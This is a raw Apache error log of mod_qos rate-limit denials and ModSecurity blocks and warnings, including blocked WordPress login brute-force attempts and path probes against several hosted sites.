[Tue May 26 20:00:50.003840 2026] [qos:error] [pid 112029:tid 112200] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8eQAAATM
[Tue May 26 20:00:50.004242 2026] [qos:error] [pid 112029:tid 112228] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8egAAAU8
[Tue May 26 20:00:50.008678 2026] [qos:error] [pid 106517:tid 106662] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1pqwAAAJE
[Tue May 26 20:00:50.031307 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:46400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1prwAAAMQ
[Tue May 26 20:00:50.037466 2026] [qos:error] [pid 112029:tid 112233] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8fAAAAVQ
[Tue May 26 20:00:50.144921 2026] [qos:error] [pid 106517:tid 106702] [client 45.148.10.120:57930] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1ptQAAALg
[Tue May 26 20:00:50.145473 2026] [qos:error] [pid 106517:tid 106660] [client 45.148.10.120:57852] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1ptwAAAI8
[Tue May 26 20:00:50.146096 2026] [qos:error] [pid 106517:tid 106742] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1ptgAAAOA
[Tue May 26 20:00:50.146374 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:46444] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1puAAAAJ8
[Tue May 26 20:00:50.146850 2026] [qos:error] [pid 112029:tid 112162] [client 45.148.10.120:46498] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8fwAAAQ0
[Tue May 26 20:00:50.151230 2026] [qos:error] [pid 112029:tid 112245] [client 45.148.10.120:46522] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8gAAAAWA
[Tue May 26 20:00:50.155614 2026] [qos:error] [pid 112029:tid 112183] [client 45.148.10.120:46546] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8gQAAASI
[Tue May 26 20:00:50.158002 2026] [qos:error] [pid 106517:tid 106712] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1puQAAAMI
[Tue May 26 20:00:50.169302 2026] [security2:error] [pid 106517:tid 106695] [client 103.163.220.31:64135] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/themes/twentytwentyfive/"] [unique_id "ahWumoZZc2DoU1lPnP1pugAAALE"]
[Tue May 26 20:00:50.234729 2026] [security2:error] [pid 112029:tid 112036] [remote 5.42.158.148:42814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.158.42.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWumqFW0C-ajaCsyFc8fQABUgY"]
[Tue May 26 20:00:50.257852 2026] [qos:error] [pid 106517:tid 106714] [client 45.148.10.120:46400] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1pvQAAAMQ
[Tue May 26 20:00:50.268553 2026] [qos:error] [pid 112029:tid 112234] [client 45.148.10.120:46486] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8gwAAAVU
[Tue May 26 20:00:50.278785 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o_AAAANI"]
[Tue May 26 20:00:50.279316 2026] [security2:error] [pid 112029:tid 112219] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8CQAAAUY"]
[Tue May 26 20:00:50.280010 2026] [security2:error] [pid 112029:tid 112255] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8EAAAAWo"]
[Tue May 26 20:00:50.286767 2026] [security2:error] [pid 106517:tid 106765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o_wAAAPc"]
[Tue May 26 20:00:50.290698 2026] [security2:error] [pid 106517:tid 106770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1o8gAAAPw"]
[Tue May 26 20:00:50.297978 2026] [security2:error] [pid 112029:tid 112212] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8EQAAAT8"]
[Tue May 26 20:00:50.298234 2026] [security2:error] [pid 112029:tid 112223] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8BwAAAUo"]
[Tue May 26 20:00:50.299490 2026] [security2:error] [pid 106517:tid 106777] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pDAAAAQM"]
[Tue May 26 20:00:50.309664 2026] [security2:error] [pid 112029:tid 112224] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8EwAAAUs"]
[Tue May 26 20:00:50.314345 2026] [security2:error] [pid 106517:tid 106767] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pBwAAAPk"]
[Tue May 26 20:00:50.321091 2026] [security2:error] [pid 112029:tid 112235] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8CAAAAVY"]
[Tue May 26 20:00:50.324468 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pDQAAALY"]
[Tue May 26 20:00:50.336412 2026] [security2:error] [pid 112029:tid 112168] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8EgAAARM"]
[Tue May 26 20:00:50.339206 2026] [security2:error] [pid 106517:tid 106725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pFgAAAM8"]
[Tue May 26 20:00:50.354820 2026] [security2:error] [pid 106517:tid 106757] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pFwAAAO8"]
[Tue May 26 20:00:50.363839 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pGAAAAJc"]
[Tue May 26 20:00:50.364869 2026] [security2:error] [pid 112029:tid 112164] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8GQAAAQ8"]
[Tue May 26 20:00:50.367779 2026] [security2:error] [pid 112029:tid 112284] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8FwAAAYc"]
[Tue May 26 20:00:50.374895 2026] [security2:error] [pid 106517:tid 106663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pDgAAAJI"]
[Tue May 26 20:00:50.377918 2026] [security2:error] [pid 112029:tid 112201] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumKFW0C-ajaCsyFc8FgAAATQ"]
[Tue May 26 20:00:50.379925 2026] [security2:error] [pid 112029:tid 112243] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8NwAAAV4"]
[Tue May 26 20:00:50.380218 2026] [security2:error] [pid 106517:tid 106717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pHwAAAMc"]
[Tue May 26 20:00:50.387458 2026] [security2:error] [pid 112029:tid 112175] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8OwAAARo"]
[Tue May 26 20:00:50.388529 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumIZZc2DoU1lPnP1pBQAAAPI"]
[Tue May 26 20:00:50.406192 2026] [security2:error] [pid 106517:tid 106773] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumYZZc2DoU1lPnP1pYQAAAP8"]
[Tue May 26 20:00:50.419676 2026] [security2:error] [pid 112029:tid 112195] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8RwAAAS4"]
[Tue May 26 20:00:50.426924 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumYZZc2DoU1lPnP1pYAAAANE"]
[Tue May 26 20:00:50.431970 2026] [security2:error] [pid 112029:tid 112286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8OgAAAYk"]
[Tue May 26 20:00:50.436133 2026] [security2:error] [pid 112029:tid 112199] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8QQAAATI"]
[Tue May 26 20:00:50.446541 2026] [security2:error] [pid 112029:tid 112276] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8QwAAAX8"]
[Tue May 26 20:00:50.574405 2026] [qos:error] [pid 106517:tid 106734] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qDAAAANg
[Tue May 26 20:00:50.576349 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumoZZc2DoU1lPnP1qDgAAANE
[Tue May 26 20:00:50.576528 2026] [qos:error] [pid 112029:tid 112256] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumqFW0C-ajaCsyFc8ogAAAWs
[Tue May 26 20:00:50.576755 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qDQAAAJs
[Tue May 26 20:00:50.577478 2026] [qos:error] [pid 112029:tid 112220] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumqFW0C-ajaCsyFc8pAAAAUc
[Tue May 26 20:00:50.578318 2026] [qos:error] [pid 112029:tid 112203] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumqFW0C-ajaCsyFc8pQAAATY
[Tue May 26 20:00:50.584272 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWumoZZc2DoU1lPnP1qEgAAAJs
[Tue May 26 20:00:50.595511 2026] [qos:error] [pid 106517:tid 106719] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qFQAAAMk
[Tue May 26 20:00:50.600293 2026] [qos:error] [pid 106517:tid 106777] [client 45.148.10.120:46294] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qFwAAAQM
[Tue May 26 20:00:50.602480 2026] [qos:error] [pid 112029:tid 112176] [client 45.148.10.120:49466] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8qAAAARs
[Tue May 26 20:00:50.680737 2026] [security2:error] [pid 106517:tid 106734] [client 103.163.220.47:61305] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/class.php"] [unique_id "ahWumoZZc2DoU1lPnP1qGAAAANg"]
[Tue May 26 20:00:50.723711 2026] [qos:error] [pid 106517:tid 106716] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qHgAAAMY
[Tue May 26 20:00:50.728537 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qHwAAANU
[Tue May 26 20:00:50.729469 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qIAAAAL0
[Tue May 26 20:00:50.730707 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:53540] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qIQAAAJs
[Tue May 26 20:00:50.731139 2026] [qos:error] [pid 106517:tid 106766] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qIgAAAPg
[Tue May 26 20:00:50.732286 2026] [qos:error] [pid 106517:tid 106775] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qIwAAAQE
[Tue May 26 20:00:50.736203 2026] [qos:error] [pid 106517:tid 106719] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qJAAAAMk
[Tue May 26 20:00:50.746146 2026] [qos:error] [pid 106517:tid 106671] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qJQAAAJo
[Tue May 26 20:00:50.753582 2026] [qos:error] [pid 106517:tid 106718] [client 45.148.10.120:46294] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qJgAAAMg
[Tue May 26 20:00:50.763713 2026] [qos:error] [pid 112029:tid 112165] [client 45.148.10.120:49466] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8qgAAARA
[Tue May 26 20:00:50.872895 2026] [qos:error] [pid 106517:tid 106731] [client 45.148.10.120:58084] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qKgAAANU
[Tue May 26 20:00:50.880421 2026] [qos:error] [pid 106517:tid 106707] [client 45.148.10.120:46404] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qKwAAAL0
[Tue May 26 20:00:50.880745 2026] [qos:error] [pid 106517:tid 106672] [client 45.148.10.120:46456] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qLAAAAJs
[Tue May 26 20:00:50.884603 2026] [qos:error] [pid 106517:tid 106766] [client 45.148.10.120:57942] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qLgAAAPg
[Tue May 26 20:00:50.884767 2026] [qos:error] [pid 106517:tid 106775] [client 45.148.10.120:53540] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qLwAAAQE
[Tue May 26 20:00:50.885873 2026] [qos:error] [pid 106517:tid 106719] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qMAAAAMk
[Tue May 26 20:00:50.888640 2026] [qos:error] [pid 106517:tid 106777] [client 45.148.10.120:46412] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qMQAAAQM
[Tue May 26 20:00:50.896063 2026] [qos:error] [pid 106517:tid 106747] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qMwAAAOU
[Tue May 26 20:00:50.906232 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:46294] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumoZZc2DoU1lPnP1qNQAAAJY
[Tue May 26 20:00:50.921306 2026] [qos:error] [pid 112029:tid 112163] [client 45.148.10.120:49466] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWumqFW0C-ajaCsyFc8rQAAAQ4
[Tue May 26 20:00:50.997095 2026] [security2:error] [pid 106517:tid 106599] [remote 144.126.139.83:58582] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.139.126.144.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWumoZZc2DoU1lPnP1qLQAApk8"]
[Tue May 26 20:00:51.179763 2026] [security2:error] [pid 112029:tid 112230] [client 103.163.220.10:47793] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/plugins/hello-plus/classes/ehp-bes.php"] [unique_id "ahWum6FW0C-ajaCsyFc8rgAAAVE"]
[Tue May 26 20:00:51.276810 2026] [security2:error] [pid 106517:tid 106659] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumYZZc2DoU1lPnP1pYgAAAI4"]
[Tue May 26 20:00:51.277132 2026] [security2:error] [pid 112029:tid 112260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8QgAAAW8"]
[Tue May 26 20:00:51.288103 2026] [security2:error] [pid 112029:tid 112285] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8SQAAAYg"]
[Tue May 26 20:00:51.288786 2026] [security2:error] [pid 112029:tid 112279] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8TAAAAYI"]
[Tue May 26 20:00:51.290885 2026] [security2:error] [pid 112029:tid 112177] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8PQAAARw"]
[Tue May 26 20:00:51.304885 2026] [security2:error] [pid 106517:tid 106768] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumYZZc2DoU1lPnP1pbQAAAPo"]
[Tue May 26 20:00:51.308484 2026] [security2:error] [pid 106517:tid 106655] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumYZZc2DoU1lPnP1pdwAAAIo"]
[Tue May 26 20:00:51.308823 2026] [security2:error] [pid 112029:tid 112172] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWumaFW0C-ajaCsyFc8TQAAARc"]
